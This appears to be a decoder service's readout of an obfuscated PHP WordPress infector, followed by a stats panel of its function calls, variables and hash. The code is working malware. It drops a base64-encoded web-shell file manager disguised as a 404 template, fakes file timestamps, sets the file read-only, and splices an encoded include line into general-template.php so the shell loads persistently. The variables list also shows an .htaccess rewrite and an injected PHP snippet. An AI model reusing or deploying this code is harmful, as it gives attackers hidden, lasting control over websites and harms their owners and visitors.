I/b3B0aW9uJkFSUkFZPXskQVJSQVl9JnBhdGg9JHBhdGgmb3B0PWNobW9kJnR5cGU9ZGlyJm5hbWU9JGRpclwiIHRpdGxlPSfmnYPpmZDorr7nva4nPgoiOwogICAgICAgICAgICBpZihpc193cml0YWJsZSgiJHBhdGgvJGRpciIpKSBlY2hvICc8Zm9udCBjb2xvcj0iZ3JlZW4iPic7CiAgICAgICAgICAgIGVsc2VpZighaXNfcmVhZGFibGUoIiRwYXRoLyRkaXIiKSkgZWNobyAnPGZvbnQgY29sb3I9InJlZCI+JzsKICAgICAgICAgICAgZWNobyBqdWVqaWFuZ19wZXJtcygiJHBhdGgvJGRpciIpOwogICAgICAgICAgICBpZihpc193cml0YWJsZSgiJHBhdGgvJGRpciIpIHx8ICFpc19yZWFkYWJsZSgiJHBhdGgvJGRpciIpKSBlY2hvICc8L2ZvbnQ+JzsKCiAgICAgICAgICAgIGVjaG8gIgo8L2E+CjwvdGQ+CgoKPHRkIGNsYXNzPXRkX2hvbWUgPjxjZW50ZXI+CjxhIGhyZWY9XCI/b3B0aW9uJkFSUkFZPXskQVJSQVl9JnBhdGg9JHBhdGgmb3B0PXJlbmFtZSZ0eXBlPWRpciZuYW1lPSRkaXJcIj7ph43lkb3lkI08L2E+CjxhIGhyZWY9XCJqYXZhc2NyaXB0OmlmKGNvbmZpcm0oJ+ehruWunuimgeWIoOmZpOWQlz8nKSlsb2NhdGlvbj0nP29wdGlvbiZBUlJBWT17JEFSUkFZfSZwYXRoPXskcGF0aH0mb3B0PWRlbGV0ZSZ0eXBlPWRpciZuYW1lPXskZGlyfSdcIj7liKDpmaQ8L2E+CjwvY2VudGVyPjwvdGQ+CjwvdHI+IjsKICAgICAgICB9CiAgICAgICAgZWNobyAnPGJyPic7CiAgICAgICAgZm9yZWFjaCgkc2NhbmRpciBhcyAkZmlsZSl7CiAgICAgICAgICAgIGlmKCFpc19maWxlKCIkcGF0aC8kZmlsZSIpKSBjb250aW51ZTsKICAgICAgICAgICAgJHNpemUgPSBmaWxlc2l6ZSgiJHBhdGgvJGZpbGUiKS8xMDI0OwogICAgICAgICAgICAkc2l6ZSA9IHJvdW5kKCRzaXplLDMpOwogICAgICAgICAgICBpZigkc2l6ZSA+PSAxMDI0KXsKICAgICAgICAgICAgICAgICRzaXplID0gcm91bmQoJHNpemUvMTAyNCwyKS4nIE1CJzsKICAgICAgICAgICAgfWVsc2V7CiAgICAgICAgICAgICAgICAkc2l6ZSA9ICRzaXplLicgS0InOwogICAgICAgICAgICB9CgoKICAgICAgICAgICAgZWNobyAiPHRyPgo8dGQgY2xhc3M9dGRfaG9tZSA+IDxpbWcgc3JjPSdkYXRhOmltYWdlL3BuZztiYXNlNjQsaVZCT1J3MEtHZ29BQUFBTlNVaEVVZ0FBQUF3QUFBQVFDQVlBQUFBaVlaNEhBQUFBQ1hCSVdYTUFBQXNUQUFBTEV3RUFtcHdZQUFBS1RXbERRMUJRYUc5MGIzTm9iM0FnU1VORElIQnliMlpwYkdVQUFIamFuVk4zV0pQM0ZqN2Y5MlVQVmtMWThMR1hiSUVBSWlPc0NNZ1FXYUlRa2dCaGhCQVNRTVdGaUFwV0ZCVVJuRWhWeElMVkNraWRpT0tnS0xoblFZcUlXb3RWWERqdUg5eW50WDE2NyszdCs5Zjd2T2VjNS96T2VjOFBnQkVTSnBIbW9tb0FPVktGUERyWUg0OVBTTVRKdllBQ0ZVamdCQ0FRNXN2Q1p3WEZBQUR3QTNsNGZuU3dQL3dCcjI4QUFnQncxUzRrRXNmaC80TzZVQ1pYQUNDUkFPQWlFdWNMQVpCU0FNZ3VWTWdVQU1nWUFMQlRzMlFLQUpRQUFHeDVmRUlpQUtvTkFPejBTVDRGQU5pcGs5d1hBTmlpSEtrSUFJMEJBSmtvUnlRQ1FMc0FZRldCVWl3Q3dNSUFvS3hBSWk0RXdLNEJnRm0yTWtjQ2dMMEZBSGFPV0pBUFFHQUFnSmxDTE13QUlEZ0NBRU1lRTgwRElFd0RvRERTditDcFgzQ0Z1RWdCQU1ETGxjMlhTOUl6RkxpVjBCcDM4dkRnNGlIaXdteXhRbUVYS1JCbUNlUWluSmViSXhOSTV3Tk16Z3dBQUJyNTBjSCtPRCtRNStiazRlWm01Mnp2OU1XaS9tdndieUkrSWZIZi9yeU1BZ1FBRUU3UDc5cGY1ZVhXQTNESEFiQjF2MnVwV3dEYVZnQm8zL2xkTTlzSm9Gb0swSHI1aTNrNC9FQWVucUZReUR3ZEhBb0xDKzBsWXFHOU1PT0xQdjh6NFcvZ2kzNzIvRUFlL3R0NjhBQnhta0NacmNDamcvMXhZVzUycmxLTzU4c0VRakZ1OStjai9zZUZmLzJPS2RIaU5MRmNMQldLOFZpSnVGQWlUY2Q1dVZLUlJDSEpsZUlTNlg4eThSK1cvUW1UZHcwQXJJWlB3RTYyQjdYTGJNQis3Z0VDaXc1WTBuWUFRSDd6TFl3YUM1RUFFR2MwTW5uM0FBQ1R2L21QUUNzQkFNMlhwT01BQUx6b0dGeW9sQmRNeGdnQUFFU2dnU3F3UVFjTXdSU3N3QTZjd1IyOHdCY0NZUVpFUUF3a3dEd1FRZ2JrZ0J3S29SaVdRUmxVd0RyWUJMV3dBeHFnRVpyaEVMVEJNVGdONStBU1hJSHJjQmNHWUJpZXdoaThoZ2tFUWNnSUUyRWhPb2dSWW83WUlzNElGNW1PQkNKaFNEU1NnS1FnNllnVVVTTEZ5SEtrQXFsQ2FwRmRTQ1B5TFhJVU9ZMWNRUHFRMjhnZ01vcjhpcnhITVpTQnNsRUQxQUoxUUxtb0h4cUt4cUJ6MFhRMEQxMkFscUpyMFJxMEhqMkF0cUtuMFV2b2RYUUFmWXFPWTREUk1RNW1qTmxoWEl5SFJXQ0pXQm9teHhaajVWZzFWbzgxWXgxWU4zWVZHOENlWWU4SUpBS0xnQlBzQ0Y2RUVNSnNncENRUjFoTVdFT29KZXdqdEJLNkNGY0pnNFF4d2ljaWs2aFB0Q1Y2RXZuRWVHSTZzWkJZUnF3bTdpRWVJWjRsWGljT0UxK1RTQ1FPeVpMa1Rnb2hKWkF5U1F0SmEwamJTQzJrVTZRKzBoQnBuRXdtNjVCdHlkN2tDTEtBckNDWGtiZVFENUJQa3Z2SncrUzNGRHJGaU9KTUNhSWtVcVNVRWtvMVpUL2xCS1dmTWtLWm9LcFJ6YW1lMUFpcWlEcWZXa2x0b0haUUwxT0hxUk0wZFpvbHpac1dROHVrTGFQVjBKcHBaMm4zYUMvcGRMb0ozWU1lUlpmUWw5SnI2QWZwNSttRDlIY01EWVlOZzhkSVlpZ1pheGw3R2FjWXR4a3ZtVXltQmRPWG1jaFVNTmN5RzVsbm1BK1liMVZZS3ZZcWZCV1J5aEtWT3BWV2xYNlY1NnBVVlhOVlA5VjVxZ3RVcTFVUHExNVdmYVpHVmJOUTQ2a0oxQmFyMWFrZFZidXBOcTdPVW5kU2oxRFBVVitqdmwvOWd2cGpEYktHaFVhZ2hraWpWR08zeGhtTklSYkdNbVh4V0VMV2NsWUQ2eXhybUUxaVc3TDU3RXgyQmZzYmRpOTdURk5EYzZwbXJHYVJacDNtY2MwQkRzYXg0UEE1Mlp4S3ppSE9EYzU3TFFNdFB5MngxbXF0WnExK3JUZmFldHErMm1MdGN1MFc3ZXZhNzNWd25VQ2RMSjMxT20wNjkzVUp1amE2VWJxRnV0dDF6K28rMDJQcmVla0o5Y3IxRHVuZDBVZjFiZlNqOVJmcTc5YnYwUjgzTURRSU5wQVpiREU0WS9ETWtHUG9hNWhwdU5Id2hPR29FY3RvdXBIRWFLUFJTYU1udUNidWgyZmpOWGdYUG1hc2J4eGlyRFRlWmR4clBHRmlhVExicE1Ta3hlUytLYzJVYTVwbXV0RzAwM1RNek1nczNLellyTW5zampuVm5HdWVZYjdadk52OGpZV2xSWnpGU29zMmk4ZVcycFo4eXdXV1RaYjNySmhXUGxaNVZ2VlcxNnhKMWx6ckxPdHQxbGRzVUJ0WG13eWJPcHZMdHFpdG02M0VkcHR0M3hUaUZJOHAwaW4xVTI3YU1lejg3QXJzbXV3RzdUbjJZZllsOW0zMnp4M01IQklkMWp0ME8zeHlkSFhNZG14d3ZPdWs0VFREcWNTcHcrbFhaeHRub1hPZDh6VVhwa3VReXhLWGRwY1hVMjJuaXFkdW4zckxsZVVhN3JyU3RkUDFvNXU3bTl5dDJXM1UzY3c5eFgyciswMHVteHZKWGNNOTcwSDA4UGRZNG5ITTQ1Mm5tNmZDODVEbkwxNTJYbGxlKzcwZVQ3T2NKcDdXTUczSTI4UmI0TDNMZTJBNlBqMWwrczdwQXo3R1BnS2ZlcCtIdnFhK0l0ODl2aU4rMW42WmZnZjhudnM3K3N2OWovaS80WG55RnZGT0JXQUJ3UUhsQWIyQkdvR3pBMnNESHdTWkJLVUhOUVdOQmJzR0x3dytGVUlNQ1ExWkgzS1RiOEFYOGh2NVl6UGNaeXlhMFJYS0NKMFZXaHY2TU13bVRCN1dFWTZHendqZkVINXZwdmxNNmN5MkNJamdSMnlJdUI5cEdaa1grWDBVS1NveXFpN3FVYlJUZEhGMDl5eldyT1JaKzJlOWp2R1BxWXk1Tzl0cXRuSjJaNnhxYkZKc1kreWJ1SUM0cXJpQmVJZjRSZkdYRW5RVEpBbnRpZVRFMk1ROWllTnpBdWRzbWpPYzVKcFVsblJqcnVYY29ya1g1dW5PeTU1M1BGazFXWkI4T0lXWUVwZXlQK1dESUVKUUx4aFA1YWR1VFIwVDhvU2JoVTlGdnFLTm9sR3h0N2hLUEpMbW5WYVY5ampkTzMxRCttaUdUMFoxeGpNSlQxSXJlWkVaa3JrajgwMVdSTmJlck0vWmNka3RPWlNjbEp5alVnMXBsclFyMXpDM0tMZFBaaXNya3cza2VlWnR5aHVUaDhyMzVDUDVjL1BiRld5RlROR2p0Rkt1VUE0V1RDK29LM2hiR0Z0NHVFaTlTRnJVTTk5bS91cjVJd3VDRm55OWtMQlF1TEN6MkxoNFdmSGdJcjlGdXhZamkxTVhkeTR4WFZLNlpIaHA4Tko5eTJqTHNwYjlVT0pZVWxYeWFubmM4bzVTZzlLbHBVTXJnbGMwbGFtVXljdHVydlJhdVdNVllaVmtWZTlxbDlWYlZuOHFGNVZmckhDc3FLNzRzRWE0NXVKWFRsL1ZmUFY1YmRyYTNrcTN5dTNyU091azYyNnM5MW0vcjBxOWFrSFYwSWJ3RGEwYjhZM2xHMTl0U3Q1MG9YcHE5WTdOdE0zS3pRTTFZVFh0Vzh5MnJOdnlvVGFqOW5xZGYxM0xWdjJ0cTdlKzJTYmExci9kZDN2ekRvTWRGVHZlNzVUc3ZMVXJlRmRydlVWOTlXN1M3b0xkanhwaUc3cS81bjdkdUVkM1Q4V2VqM3VsZXdmMlJlL3JhblJ2Yk55dnY3K3lDVzFTTm8wZVNEcHc1WnVBYjlxYjdacDN0WEJhS2c3Q1FlWEJKOSttZkh2alVPaWh6c1BjdzgzZm1YKzM5UWpyU0hrcjBqcS9kYXd0bzIyZ1BhRzk3K2lNbzUwZFhoMUh2cmYvZnU4eDQyTjF4eldQVjU2Z25TZzk4Zm5rZ3BQanAyU25ucDFPUHozVW1keDU5MHo4bVd0ZFVWMjlaMFBQbmo4WGRPNU10MS8zeWZQZTU0OWQ4THh3OUNMM1l0c2x0MHV0UGE0OVIzNXcvZUZJcjF0djYyWDN5KzFYUEs1MDlFM3JPOUh2MDMvNmFzRFZjOWY0MXk1ZG4zbTk3OGJzRzdkdUp0MGN1Q1c2OWZoMjl1MFhkd3J1VE54ZGVvOTRyL3krMnYzcUIvb1A2biswL3JGbHdHM2crR0RBWU0vRFdRL3ZEZ21IbnY2VS85T0g0ZEpIekVmVkkwWWpqWStkSHg4YkRScTk4bVRPaytHbnNxY1R6OHArVnY5NTYzT3I1OS85NHZ0THoxajgyUEFMK1l2UHY2NTVxZk55NzZ1cHJ6ckhJOGNmdk01NVBmR20vSzNPMjMzdnVPKzYzOGU5SDVrby9FRCtVUFBSK21QSHA5QlA5ejduZlA3OEwvZUU4L3NsMHA4ekFBQUFJR05JVWswQUFIb2xBQUNBZ3dBQStmOEFBSURwQUFCMU1BQUE2bUFBQURxWUFBQVhiNUpmeFVZQUFBRzRTVVJCVkhqYWZKTFBhaE5SRk1aLzk5eVphYkJ4Q05OS2l5Z294R0NnbEJaY3VDZ0k5ZzJLTDFOQ3dTNUtYOEFuVUxvU3VuUFZyZHZHZ0J1cEVWMjRFV1FDTThuTTVNKzkxOFZNUnVPaTMrckNQZC81ZmVmY3ExNzFYanUwNVRiWnVlSHkvRXdCZUdqTDI1TVQ1c2F3TUlhSlhUVi9HZ3g0ZDNYRjBYSFBYWjZmS1FHdzFySXdocGt4bU9tVVBNdEl4Mk9TSkdHY3Bydy9QVVY4emRGeHo4azRUZXR1Z2RZMGdvQkFhendSbEFoeEhQUG00b0lYblE2ZkIzMDhBQkhoWTc4UHdOWjZ4SzlKekc2M0M4REx3ME9jdFlSaHlJZnI2OUlBMEc2M2NWWCtKaTBhUVFDekdRQ0xmMmJ5QUxSU0RJZkR1anZBdDZvZzhockVpNEw5dmIzU1VHUVpTb1NublE0TGE3bExWSk9XdWw4VUFCUlpWczNnSEY5dWJ1cUNKV2xyUFNwcGs1aUQ3ZTJLa09jQTdIYTd6SXdwTS85SGF0TEMwNW9pei84Ty9mUHJkOEtXejQvZmFVMEJtRTh6L0xVNzZNM05rakF0Q3JRSUQ1NDhMa24zWUdZTUQ2TUlheTJtb2dKTWkyS1ZBQkMyZlBMYzU5SEdCb2dBWUl4QnFyTzNmT21ENTgvS3l5cTNjUTZ0VkcwQ0dLY3BYaklhcmF4UWkyQ3NMWXNCSllKVENpVkNNaHFobWpzN3p0cmJ2L2RTSXNLZkFRRGZJc0tIdkFaWVpBQUFBQUJKUlU1RXJrSmdnZz09Jz4KCiI7Ci8vIDxhIGhyZWY9XCI/QVJSQVk9eyRBUlJBWX0mZmlsZXNyYz0kcGF0aC8kZmlsZSZwYXRoPSRwYXRoXCI+JGZpbGU8L2E+CiAgICAgICAgICAgIGVjaG8gIgo8YSBocmVmPVwiP29wdGlvbiZBUlJBWT17JEFSUkFZfSZwYXRoPXskcGF0aH0mb3B0PWVkaXQmdHlwZT1maWxlJm5hbWU9eyRmaWxlfVwiPnskZmlsZX08L2E+CjwvdGQ+Cjx0ZCBjbGFzcz10ZF9ob21lPjxjZW50ZXI+Ii4kc2l6ZS4iPC9jZW50ZXI+PC90ZD4KPHRkIGNsYXNzPXRkX2hvbWUgYWxpZ249J2NlbnRlcic+PGEgaHJlZj1cIj9vcHRpb24mQVJSQVk9eyRBUlJBWX0mcGF0aD0kcGF0aCZvcHQ9Y2htb2QmdHlwZT1maWxlJm5hbWU9JGZpbGVcIiB0aXRsZT0n5p2D6ZmQ6K6+572uJz4iOwoKCgogICAgICAgICAgICBpZihpc193cml0YWJsZSgiJHBhdGgvJGZpbGUiKSkgZWNobyAnPGZvbnQgY29sb3I9ImdyZWVuIj4nOwogICAgICAgICAgICBlbHNlaWYoIWlzX3JlYWRhYmxlKCIkcGF0aC8kZmlsZSIpKSBlY2hvICc8Zm9udCBjb2xvcj0icmVkIj4nOwogICAgICAgICAgICBlY2hvIGp1ZWppYW5nX3Blcm1zKCIkcGF0aC8kZmlsZSIpOwogICAgICAgICAgICBpZihpc193cml0YWJsZSgiJHBhdGgvJGZpbGUiKSB8fCAhaXNfcmVhZGFibGUoIiRwYXRoLyRmaWxlIikpIGVjaG8gJzwvZm9udD4nOwogICAgICAgICAgICBlY2hvICI8L2E+PC90ZD4KPHRkIGNsYXNzPXRkX2hvbWU+PGNlbnRlcj4KPGEgaHJlZj1cIj9vcHRpb24mQVJSQVk9eyRBUlJBWX0mcGF0aD0kcGF0aCZvcHQ9ZWRpdCZ0eXBlPWZpbGUmbmFtZT0kZmlsZVwiPue8lui+kTwvYT4KPGEgaHJlZj1cIj9vcHRpb24mQVJSQVk9eyRBUlJBWX0mcGF0aD0kcGF0aCZvcHQ9cmVuYW1lJnR5cGU9ZmlsZSZuYW1lPSRmaWxlJnBhdGg9JHBhdGhcIj7ph43lkb3lkI08L2E+CjxhIGhyZWY9XCJqYXZhc2NyaXB0OmlmKGNvbmZpcm0oJ+ehruWunuimgeWIoOmZpOWQlz8nKSlsb2NhdGlvbj0nP29wdGlvbiZBUlJBWT17JEFSUkFZfSZwYXRoPXskcGF0aH0mb3B0PWRlbGV0ZSZ0eXBlPWZpbGUmbmFtZT17JGZpbGV9J1wiPuWIoOmZpDwvYT4KPC9jZW50ZXI+PC90ZD4KPC90cj4iOwogICAgICAgIH0KICAgICAgICBlY2hvICc8L3RhYmxlPgo8L2Rpdj4nOwogICAgfQogICAgZWNobyAnPGJyPjxicj48YnI+PGJyPjwvYj4KPC9ib2R5PiA8L2h0bWw+PC9ib2R5Pgo8L2h0bWw+JzsKICAgIGRpZTsKZW5kaWY7ICAvLyA9PT09CgoKCgoKCg=="; // WP 404
  @chmod($jue_jiang_404_path, 0644);
  @file_put_contents($jue_jiang_404_path, base64_decode($jue_jiang_404));
  @touch($jue_jiang_404_path, filectime($file_general_template_path));
  @chmod($jue_jiang_404_path, 0444);
}

$general_template_code = @file_get_contents($file_general_template_path);
$gen_mat = base64_decode("QGluY2x1ZGVbXHNdK2Jhc2U2NF9kZWNvZGVbXHNdKj9cKCJbMC05YS16QS1aLT0rXC9dKyJcKTs=");
$isget_mat = preg_match("/{$gen_mat}/i",$general_template_code)?true:false;
if (!$isget_mat){
  $pma = base64_decode("ZnVuY3Rpb25bXHNdW2EtekEtWjAtOV9dKlwoLio/XCkuKg==");
  preg_match_all("/{$pma}/i",$general_template_code,$pr);
  $gen_temp_fun_name = $pr[0][rand(0,count($pr[0])-1)];
  $jj404_b64_path = base64_encode($jue_jiang_404_path);
  $new_general_template = str_replace($gen_temp_fun_name,"@include base64_decode(\"{$jj404_b64_path}\");".PHP_EOL.$gen_temp_fun_name,$general_template_code);
  @chmod($file_general_template_path, 0644);
  @file_put_contents($file_general_template_path,$new_general_template);
  @touch($file_general_template_path, filectime($file_general_template_path));
}

Function Calls

md5 4
chmod 1
base64_decode 2
set_time_limit 1
error_reporting 1
file_get_contents 2
ignore_user_abort 1

Variables

$do /home/allsoftwaremart/public_html/
$index_code
$yuan_htaccess
$huan_yuan_htaccess <FilesMatch '.(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|pHP7|PHP..
$open_cache_ruzhu_phpcode <?php /*-PcVg1<-*/error_reporting(0); $CR /*-h4TRC^}<sQfRI-*..

Stats

MD5 d5266a5bc135783908002f8056e9193d
Eval Count 0
Decode Time 2995 ms